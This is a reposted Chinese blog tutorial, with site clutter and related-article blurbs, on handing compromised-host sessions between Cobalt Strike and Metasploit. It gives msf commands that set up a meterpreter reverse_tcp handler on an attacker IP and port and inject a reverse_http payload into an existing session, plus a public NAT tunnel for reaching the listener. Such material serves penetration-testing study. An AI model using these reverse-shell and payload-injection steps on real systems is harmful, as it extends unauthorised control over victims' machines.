2021-06-30cs和msf联动派生会话shell

最新推荐文章于 2024-05-13 10:53:15 发布
最新推荐文章于 2024-05-13 10:53:15 发布
阅读量633 收藏 3
点赞数
分类专栏: cobalt strike
原文链接:https://blog.csdn.net/weixin_39251927/article/details/106044399
版权

一、当cs获取到会话后反弹给msf

1、msf上操作

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.52.208
set lport 7777
exploit -j #-j 后台监听

  
  
  
  
  • 1
  • 2
  • 3
  • 4
  • 5

2、CS上操作

首先有一个已经建立会话的shell,然后添加监听器Listener,HOST和PORT填写msf监听的地址IP:x.x.x.x,PORT:7777

配置内网穿透

如果msf主机处于内网那么我们可以通过内网穿透到公网上例如使用https://natapp.cn/,在里面添加隧道;
本地地址:LHOST-IP
本地端口:LPORT-端口
在这里插入图片描述
在这里插入图片描述
监听地址和端口:
server.natappfree.cc:37061 = 112.74.89.58:37061
在这里插入图片描述
配置好后在上线的主机上右击Spawn
在这里插入图片描述

查看msf
在这里插入图片描述

二、当msf获取到会话后反弹给cs

首先获取到一个msf会话,session id为1

1、cs操作

开启Listener,
在这里插入图片描述

2、msf配置

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost x.x.x.x               #cobaltstrike监听的ip
set lport 6789                 #cobaltstrike监听的端口 
set session 1                   #这里是获得的session的id
exploit

  
  
  
  
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

在这里插入图片描述
返回CS查看反弹成功。
在这里插入图片描述

三、当cs获取到会话后给另一个cs

AB之间相互建立监听,后目标主机右键Spawn即可

参考:https://blog.csdn.net/qq_36119192/article/details/98472536
https://www.freesion.com/article/22873048/

热热的雨夜
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
csmsf联动概述
weixin_43873557的博客
02-08 2411
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。 获得beacon shell,启动socks shell ipconfig 目标机器在24.*网段,仅一个网段 思路:利用 beacon shell 在目标机器和团队服 务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。 查看团队服务器 socks 端口启起来了没有:netst
Cobalt Strike与MSF联动
weixin_42035825的博客
03-29 2871
cs会话---->msf会话 注意:必须安装java 我这里使用的是cs4.0版本的,所以后面的有些东西会和以前的有些差异,但并不影响。 进入目录,启动cs的服务端,命令格式:./teamserver ip 密码; 客户端有两种一种是windows版,一种是linux版。这里采用linux版本,但都必须是在java环境里面; 启动客户端: host:服务器端的ip; port:服务器...
cobaltstrike攻击流程,联动msf之socks代理
cc777777777的博客
05-15 1031
cobaltstrike攻击流程,联动msf之socks代理
CS联动MSF
m0_72125469的博客
05-27 573
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动
【渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】_cobalt 信回话(2)
最新发布
2401_84969389的博客
05-13 272
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
MSFCS联动
GoDunTong's Blog
04-08 4149
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
CVE-2021-1732-Exploit:CVE-2021-1732漏洞利用
03-06
**CVE-2021-1732漏洞详解** CVE-2021-1732是一个针对Microsoft Windows操作系统的重要安全漏洞,主要影响Windows 10版本1909的x64架构系统。这个漏洞是由于操作系统组件中的一个编程错误导致的,它可能被恶意攻击者...
专题资料(2021-2022年)[3]MSF的接收和发送数据流程韩婷.doc
10-07
在本项目中,MSF-0使用16位与SDH接口芯片PM5352通过POS-PHY2协议连接,MSF-2和MSF-3各使用8位,分别与千兆以太网模块和高速串行接口模块通过POS-PHY3协议连接。 数据接收流程如下: 1. 数据通过Rx pins(接收引脚...
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
精品资料(2021-2022年收藏)热法及膜法海水淡化经济性分析汇总.doc
10-10
海水淡化是一种重要的水资源获取方式,尤其对于沿海地区和淡水资源匮乏的国家至关重要。本文将深入探讨两种主要的海水淡化技术——热法和膜法,并分析它们的经济性。 1. 热法淡化技术 热法,也称为蒸发法,是通过...
msf联动cs
hmysn的博客
12-31 2117
Cobalt Strike简称CS 用于团队作战使用,由一个服务端和多个客户端组成,能让多个攻击者这在一个团队服务器上共享目标资源和信息,我们在使用msf获得权限以后,可以将信息共享到cs上,使用cs来进行监听以及其他的操作。
后渗透之MSF联动CS
dl1286670932的博客
12-14 514
Cobalt Strike(简称CS)是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动,分为服务器和客户端。MSF这边已经成功获得一台主机会话,需要将这个会话上线CSCS这边成功上线了一台主机,同MSF一致。可以看到后台开启的软件服务进程。MSF这里输入payload。CS这边新建一个监听器。
msfcs联动
bring_coco的博客
05-18 1984
环境:kali(192.168.190.128)NATAPP。
csmsf联动
inslight的博客
09-22 1001
csmsf联动
细说——CS联动MSF
LainWith的博客
08-06 5586
目录环境准备CS ——> MSFubuntu准备cs客户机器准备msf准备补充MSF ——> CSMSF准备ubuntu-cs准备 网上的文章,写的很简介,看的脑壳疼,自己动手,详实的记录一下学习过程 环境准备 我使用两台vps,一台是kali 52.69.164.3,一台是ubuntu 52.194.218.196​ kali使用msf,ubuntu使用cs服务器,物理机使用cs客户端,虚拟机win7是受害者 CS ——> MSF 简单来说,就是当cs拿到一台主机之后,新增一个用于转发
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 1695
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
CS + MSF 联动
A_dmin的博客
12-23 1562
CS + MSF 联动 首先cs上已经成功上线: Kali查看IP地址: Msf上操作: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.198.128 set lport 7777 exploit -j #-j 后台监听(ps:这里手抖少打了一个7) 如果msf处于公网,cs添加监听器Listener,HOST和PORT填写msf监听的地址IP:xxxx,PORT:7777
MSFCS联动
一纸荒芜的博客
08-27 2401
msfcs
msf命令 -p 和-f什么意思
05-16
msf 命令是 Metasploit Framework 的命令行工具。其中,-p 选项是指定要使用的 payload,payload 是指用来执行攻击的代码。而 -f 选项是指定输出文件的格式。例如,你可以使用 -f exe 选项将生成的攻击文件保存为可执行文件格式。具体使用方式可以在 msf 命令行中输入 help 命令查看帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值